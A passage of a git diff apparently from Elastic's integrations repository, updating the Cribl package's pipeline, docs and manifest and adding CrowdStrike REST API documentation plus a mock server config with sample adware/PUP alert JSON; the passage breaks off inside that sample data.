privileges”, be sure to review the Indices privileges to provide at least "auto_configure" and "write" permissions for the logs-* index, which you will be using for these Fleet integration data streams. \ No newline at end of file diff --git a/packages/cribl/changelog.yml b/packages/cribl/changelog.yml index 416bf37c8a8..cb5384708cb 100644 --- a/packages/cribl/changelog.yml +++ b/packages/cribl/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "0.3.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 +- version: "0.2.0" + changes: + - description: Adds the second phase of the Cribl package + type: enhancement + link: https://github.com/elastic/integrations/pull/9097 - version: "0.1.2" changes: - description: Changed owners diff --git a/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml b/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml index 325790fbe1b..c1b465abebf 100644 --- a/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cribl/data_stream/logs/elasticsearch/ingest_pipeline/default.yml @@ -3,12 +3,20 @@ description: Pipeline for rerouting log streams from Cribl. processors: - set: field: ecs.version - value: 8.11.0 + value: 8.13.0 - append: field: tags value: - cribl allow_duplicates: false + - rename: + field: _raw + target_field: message + ignore_missing: true + # The Cribl routing pipeline is managed by Kibana + # https://github.com/elastic/kibana/pull/176439 + - pipeline: + name: 'cribl-routing-pipeline' on_failure: - set: field: error.message diff --git a/packages/cribl/docs/README.md b/packages/cribl/docs/README.md index cefca6efbdf..8963da8fddf 100644 --- a/packages/cribl/docs/README.md +++ b/packages/cribl/docs/README.md @@ -16,17 +16,9 @@ The Cribl integration offers users a way to ingest logs from either of Cribl's E ![Install Cisco ASA assets](../img/install-assets.png) -2. Update reroute rule logic +2. Configuring the Cribl integration - In order to specify the routing logic to be able to direct your events from Cribl to an Elastic integration datastream, setup a custom ingest pipeline for the Cribl integration. - - 1. Identify the name of the Elastic dataset - - Review the relevant [integration documentation](https://docs.elastic.co/integrations) to determine the correct es_datastream_name value. The data stream components can be found in the example event for each integration. - - ![Cisco ASA sample event documentation](../img/sample-event-dataset-name.png) - - 2. Add informational field to Cribl Source + 1. Add informational field to Cribl Source Configure the Cribl Source to specify the source of the data in the `_dataId` field. @@ -34,35 +26,18 @@ The Cribl integration offers users a way to ingest logs from either of Cribl's E See [Cribl Data Onboarding](https://docs.cribl.io/stream/data-onboarding/) for more information on configuring sources. - 3. Create custom pipeline - - In Kibana, navigate to **Management** > **Stack Management** in the side bar. Under the **Ingest** header, select **Ingest Pipelines**. Click **Create pipeline** > **New pipeline**. - - **Custom pipeline configuration** - 1. The pipeline **Name** must be `logs-cribl@custom`. - - 2. **Add a processor** + 2. Configure the Cribl integration in Kibana - 1. Set the **Dataset** to the value identified in the step above (`cisco_asa.log` for our example). + Note: The Cribl integration does not require Elastic Agent, but a policy must be configured when setting up the Cribl integration. - 2. Set the **Namespace** to `default`. +4. Configure an Elastic destination in Cribl - 3. Fill in the conditional to specify the Cribl `_dataId` source field. - - ![Reroute processor](../img/custom-pipeline-reroute-processor.png) - -3. Configure an Elastic destination in Cribl - - Cribl offers two options for sending data to Elastic, the Elastic Cloud ouput for cloud environments, and the Elasticsearch output for self-managed. Consult the or the [Cribl Elastic Cloud documentation](https://docs.cribl.io/stream/destinations-elastic-cloud/) or [Cribl Elasticsearch documentation](https://docs.cribl.io/stream/destinations-elastic/) for more details on how to configure. + Cribl offers two options for sending data to Elastic, the Elastic Cloud output for cloud environments, and the Elasticsearch output for self-managed. Consult [Cribl Elastic Cloud documentation](https://docs.cribl.io/stream/destinations-elastic-cloud/) or [Cribl Elasticsearch documentation](https://docs.cribl.io/stream/destinations-elastic/) for more details on how to configure. **Destination settings** - 1. Set **Cloud Id** for the Cloud destination or **Bulk API URLs** for the Elasticaearch destination to point to your Elastic cluster. + 1. Set **Cloud Id** for the Cloud destination or **Bulk API URLs** for the Elasticsearch destination to point to your Elastic cluster. 2. Set **Index or Data Stream** to `logs-cribl-default`. - 3. **API key** should be a Base64 encoded Elastic API key, which can be created in Kibana by following the instructions under API Keys. If you are using an API key with “Restrict privileges”, be sure to review the Indices privileges to provide at least "auto_configure" & "write" permissions for the logs-* index, which you will be using for these Fleet integration data streams. - - - - \ No newline at end of file + 3. **API key** should be a Base64 encoded Elastic API key, which you can create in Kibana by following the instructions under **Management** > **Stack Management** > **Security** > **API Keys**. If you are using an API key with “Restrict privileges”, be sure to review the Indices privileges to provide at least "auto_configure" and "write" permissions for the logs-* index, which you will be using for these Fleet integration data streams. \ No newline at end of file diff --git a/packages/cribl/img/custom-pipeline-reroute-processor.png b/packages/cribl/img/custom-pipeline-reroute-processor.png deleted file mode 100644 index 92884cfc2d1..00000000000 Binary files a/packages/cribl/img/custom-pipeline-reroute-processor.png and /dev/null differ diff --git a/packages/cribl/img/sample-event-dataset-name.png b/packages/cribl/img/sample-event-dataset-name.png deleted file mode 100644 index 77ed44f8afb..00000000000 Binary files a/packages/cribl/img/sample-event-dataset-name.png and /dev/null differ diff --git a/packages/cribl/manifest.yml b/packages/cribl/manifest.yml index b54b5369413..66cb85b6031 100644 --- a/packages/cribl/manifest.yml +++ b/packages/cribl/manifest.yml @@ -1,19 +1,26 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: cribl title: "Cribl" -version: 0.1.2 +version: 0.3.0 description: Stream logs from Cribl into Elastic. type: integration categories: - custom conditions: kibana: - version: "^8.8.0" + version: "^8.13.0" icons: - src: /img/logo.svg title: Cribl logo size: 32x32 type: image/svg+xml +vars: + - name: route_entries + type: textarea + title: Route mappings from Cribl sources to Elastic datastreams + multi: false + required: true + show_user: false owner: github: elastic/security-service-integrations type: elastic diff --git a/packages/crowdstrike/_dev/build/build.yml b/packages/crowdstrike/_dev/build/build.yml index 2bfcfc223b0..71f48ba2a9c 100644 --- a/packages/crowdstrike/_dev/build/build.yml +++ b/packages/crowdstrike/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: "git@v8.11.0" + import_mappings: true diff --git a/packages/crowdstrike/_dev/build/docs/README.md b/packages/crowdstrike/_dev/build/docs/README.md index aa4f3649bb8..119d20db175 100644 --- a/packages/crowdstrike/_dev/build/docs/README.md +++ b/packages/crowdstrike/_dev/build/docs/README.md @@ -1,17 +1,54 @@ # CrowdStrike Integration -This integration is for [CrowdStrike](https://www.crowdstrike.com/resources/?cs_query=type=5) products. It includes the -following datasets for receiving logs: +The [CrowdStrike](https://www.crowdstrike.com/) Falcon integration allows you to easily connect your CrowdStrike Falcon platform to Elastic for seamless onboarding of alerts and telemetry from CrowdStrike Falcon and Falcon Data Replicator. Elastic Security can leverage this data for security analytics including correlation, visualization and incident response. It provides support using three different modes for integrating CrowdStrike to the Elastic: + +1. Falcon SIEM Connector: This is a pre-built integration designed to connect CrowdStrike Falcon with Security Information and Event Management (SIEM) systems. It streamlines the flow of security data from CrowdStrike Falcon to the SIEM, providing a standardized and structured way of feeding information into the SIEM platform. It includes the following datasets for receiving logs: - `falcon` dataset: consists of endpoint data and Falcon platform audit data forwarded from [Falcon SIEM Connector](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem/). + +2. CrowdStrike REST API: This provides a programmatic interface to interact with the CrowdStrike Falcon platform. It allows users to perform various operations such as querying information about unified alerts and hosts/devices. It includes the following datasets for receiving logs: + +- `alert` dataset: It is typically used to retrieve detailed information about unified alerts generated by the CrowdStrike Falcon platform, via Falcon Intelligence Alert API - `/alerts/entities/alerts/v2`. + +- `host` dataset: It retrieves all the hosts/devices in your environment providing information such as device metadata, configuration, and status generated by the CrowdStrike Falcon platform, via Falcon Intelligence Host/Device API - `/devices/entities/devices/v2`. It is more focused to provide the management and monitoring information of devices such as login details, status, policies, configuration etc. + +3. Falcon Data Replicator: This Collect events in near real time from your endpoints and cloud workloads, identities and data. CrowdStrike Falcon Data Replicator (FDR) enables you with actionable insights to improve SOC performance. FDR contains near real-time data collected by the Falcon platform's single, lightweight agent. It includes the following datasets for receiving logs: + - `fdr` dataset: consists of logs forwarded using the [Falcon Data Replicator](https://github.com/CrowdStrike/FDR). ## Compatibility -This integration supports CrowdStrike Falcon SIEM-Connector-v2.0. +This integration is compatible with both CrowdStrike Falcon SIEM-Connector-v2.0 and REST API. +For Rest API support, this module has been tested against the **CrowdStrike API Version v1/v2**. + +The minimum **kibana.version** required is **8.12.0**. + +## Setup +### To collect data from CrowdStrike REST API, the following parameters from your CrowdStrike instance are required: + +1. Client ID +2. Client Secret +3. Token url +4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Alert | read:alert | + | Host | read:host | ## Logs +### Alert + +This is the `Alert` dataset. + +#### Example + +{{event "alert"}} + +{{fields "alert"}} + ### Falcon Contains endpoint data and CrowdStrike Falcon platform audit data forwarded from Falcon SIEM Connector. @@ -37,6 +74,7 @@ Current supported event types are: - Mobile Detection events - Recon Notification events - XDR Detection events +- Scheduled Report Notification events {{fields "falcon"}} @@ -171,3 +209,13 @@ and/or `session_token`. {{fields "fdr"}} {{event "fdr"}} + +### Host + +This is the `Host` dataset. + +#### Example + +{{event "host"}} + +{{fields "host"}} diff --git a/packages/crowdstrike/_dev/deploy/docker/docker-compose.yml b/packages/crowdstrike/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..30a764a17aa --- /dev/null +++ b/packages/crowdstrike/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,28 @@ +version: '2.3' +services: + crowdstrike-alert: + image: docker.elastic.co/observability/stream:v0.13.0 + hostname: crowdstrike-alert + ports: + - 8090 + volumes: + - ./files:/files:ro + environment: + PORT: '8090' + command: + - http-server + - --addr=:8090 + - --config=/files/config-alert.yml + crowdstrike-host: + image: docker.elastic.co/observability/stream:v0.13.0 + hostname: crowdstrike-host + ports: + - 8090 + volumes: + - ./files:/files:ro + environment: + PORT: '8090' + command: + - http-server + - --addr=:8090 + - --config=/files/config-host.yml diff --git a/packages/crowdstrike/_dev/deploy/docker/files/config-alert.yml b/packages/crowdstrike/_dev/deploy/docker/files/config-alert.yml new file mode 100644 index 00000000000..0d862d79005 --- /dev/null +++ b/packages/crowdstrike/_dev/deploy/docker/files/config-alert.yml @@ -0,0 +1,482 @@ +rules: + - path: /oauth2/token + methods: ['POST'] + responses: + - status_code: 200 + headers: + Content-Type: + - 'application/json' + body: | + {"access_token":"xxxx","expires_in":3600,"token_type":"Bearer","refresh_token":"yyyy"} + - path: /alerts/queries/alerts/v2 + methods: ['GET'] + query_params: + offset: 0 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017724698,"pagination":{"offset":0,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"a21557a2-abd0-4363-9293-727c38084b3b"},"resources":["abc"]} + - path: /alerts/queries/alerts/v2 + methods: ['GET'] + query_params: + offset: 1 + limit: 1 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: | + {"meta":{"query_time":0.017734699,"pagination":{"offset":1,"limit":1,"total":2},"writes":{"resources_affected":0},"powered_by":"detectsapi","trace_id":"cc557a2-aad0-4364-9293-727c38084n3b"},"resources":["def"]} + - path: /alerts/entities/alerts/v2 + methods: ['POST'] + request_body: /.*"abc"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_id":"2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id":"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype":"exe", + "cid":"92012896127c4a948236ba7601b886b0", + "cloud_indicator":"false", + "cmdline":"\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id":"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence":10, + "context_timestamp":"2023-11-03T18:00:31Z", + "control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids":{ + "Sensor":[ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids":{ + "Sensor":[ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp":"2023-11-03T19:00:23.985020992Z", + "created_timestamp":"2023-11-03T18:01:23.995794943Z", + "data_domains":[ + "Endpoint" + ], + "description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device":{ + "agent_load_flags":"0", + "agent_local_time":"2023-10-12T03:45:57.753Z", + "agent_version":"7.04.17605.0", + "bios_manufacturer":"ABC", + "bios_version":"F8CN42WW(V2.05)", + "cid":"92012896127c4a948236ba7601b886b0", + "config_id_base":"65994763", + "config_id_build":"17605", + "config_id_platform":"3", + "device_id":"2ce412d17b334ad4adc8c1c54dbfec4b", + "external_ip":"81.2.69.142", + "first_seen":"2023-04-07T09:36:36Z", + "groups":[ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo":{ + "active_directory_dn_display":[ + "WinComputers", + "WinComputers\\ABC" + ], + "domain":"ABC.LOCAL" + }, + "hostname":"ABC709-1175", + "last_seen":"2023-11-03T17:51:42Z", + "local_ip":"81.2.69.142", + "mac_address":"ab-21-48-61-05-b2", + "machine_domain":"ABC.LOCAL", + "major_version":"10", + "minor_version":"0", + "modified_timestamp":"2023-11-03T17:53:43Z", + "os_version":"Windows11", + "ou":[ + "ABC", + "WinComputers" + ], + "platform_id":"0", + "platform_name":"Windows", + "pod_labels":null, + "product_type":"1", + "product_type_desc":"Workstation", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"LENOVO", + "system_product_name":"20VE" + }, + "falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details":{ + "cmdline":"C:\\Windows\\system32\\userinit.exe", + "filename":"userinit.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id":"4328", + "md5":"b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id":"392734873135", + "sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp":"2023-10-30T16:49:19Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"yuvraj.mahajan" + }, + "has_script_or_module_ioc":"true", + "id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context":[ + { + "ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source":"library_load", + "ioc_type":"hash_sha256", + "ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type":"module" + } + ], + "ioc_values":[], + "is_synthetic_quarantine_disposition":true, + "local_process_id":"17076", + "logon_domain":"ABSYS", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + "name":"PrewittPupAdwareSensorDetect-Lowest", + "objective":"FalconDetectionMethod", + "parent_details":{ + "cmdline":"C:\\WINDOWS\\Explorer.EXE", + "filename":"explorer.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id":"1040", + "md5":"8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id":"392736520876", + "sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp":"2023-11-03T18:00:32Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + }, + "parent_process_id":"392736520876", + "pattern_disposition":2176, + "pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details":{ + "blocking_unsupported_or_disabled":false, + "bootup_safeguard_enabled":false, + "critical_process_disabled":false, + "detect":false, + "fs_operation_blocked":false, + "handle_operation_downgraded":false, + "inddet_mask":false, + "indicator":false, + "kill_action_failed":false, + "kill_parent":false, + "kill_process":false, + "kill_subprocess":false, + "operation_blocked":false, + "policy_disabled":false, + "process_blocked":true, + "quarantine_file":true, + "quarantine_machine":false, + "registry_operation_blocked":false, + "rooting":false, + "sensor_only":false, + "suspend_parent":false, + "suspend_process":false + }, + "pattern_id":5761, + "platform":"Windows", + "poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time":"1699034421", + "process_id":"399748687993", + "process_start_time":"1699034413", + "product":"epp", + "quarantined_files":[ + { + "filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state":"quarantined" + } + ], + "scenario":"NGAV", + "severity":30, + "sha1":"0000000000000000000000000000000000000000", + "sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui":true, + "source_products":[ + "FalconInsight" + ], + "source_vendors":[ + "CrowdStrike" + ], + "status":"new", + "tactic":"MachineLearning", + "tactic_id":"CSTA0004", + "technique":"Adware/PUP", + "technique_id":"CST0000", + "timestamp":"2023-11-03T18:00:22.328Z", + "tree_id":"1931778", + "tree_root":"38687993", + "triggering_process_graph_id":"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type":"ldt", + "updated_timestamp":"2023-11-03T19:00:23.985007341Z", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"mohit.jha" + } + ] + } + - path: /alerts/entities/alerts/v2 + methods: ['POST'] + request_body: /.*"def"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_id":"3cd412d17b334bb4adc8c1c54dbfec4b", + "aggregate_id":"aggind:6ce415d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype":"exe", + "cid":"12012896127c48236ba7601b886b0", + "cloud_indicator":"true", + "cmdline":"\"C:\\Users\\yuvraj.jha\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id":"9289012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence":11, + "context_timestamp":"2023-11-04T18:00:31Z", + "control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids":{ + "Sensor":[ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids":{ + "Sensor":[ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp":"2023-11-03T19:00:23.985020992Z", + "created_timestamp":"2023-11-03T18:01:23.995794943Z", + "data_domains":[ + "Endpoint" + ], + "description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device":{ + "agent_load_flags":"0", + "agent_local_time":"2023-10-12T03:45:57.753Z", + "agent_version":"7.04.17605.0", + "bios_manufacturer":"ABC", + "bios_version":"F8CN42WW(V2.05)", + "cid":"92012896127c4a948236ba7601b886b0", + "config_id_base":"65994763", + "config_id_build":"17605", + "config_id_platform":"3", + "device_id":"2ce412d17b334ad4adc8c1c54dbfec4b", + "external_ip":"81.2.69.142", + "first_seen":"2023-04-07T09:36:36Z", + "groups":[ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo":{ + "active_directory_dn_display":[ + "WinComputers", + "WinComputers\\ABC" + ], + "domain":"ABC.LOCAL" + }, + "hostname":"ABC709-1175", + "last_seen":"2023-11-03T17:51:42Z", + "local_ip":"81.2.69.142", + "mac_address":"ab-21-48-61-05-b2", + "machine_domain":"ABC.LOCAL", + "major_version":"10", + "minor_version":"0", + "modified_timestamp":"2023-11-03T17:53:43Z", + "os_version":"Windows11", + "ou":[ + "ABC", + "WinComputers" + ], + "platform_id":"0", + "platform_name":"Windows", + "pod_labels":null, + "product_type":"1", + "product_type_desc":"Workstation", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"LENOVO", + "system_product_name":"20VE" + }, + "falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details":{ + "cmdline":"C:\\Windows\\system32\\userinit.exe", + "filename":"userinit.exe", + "filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id":"4328", + "md5":"b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id":"392734873135", + "sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp":"2023-10-30T16:49:19Z", + "user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name":"yuvraj.mahajan" + }, + "has_script_or_module_ioc":"true", + "id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context":[ + { + "ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source":"library_load", + "ioc_type":"hash_sha256", + "ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5":"cdf9cfebb400ce89d5b6032bfcdc693b", + 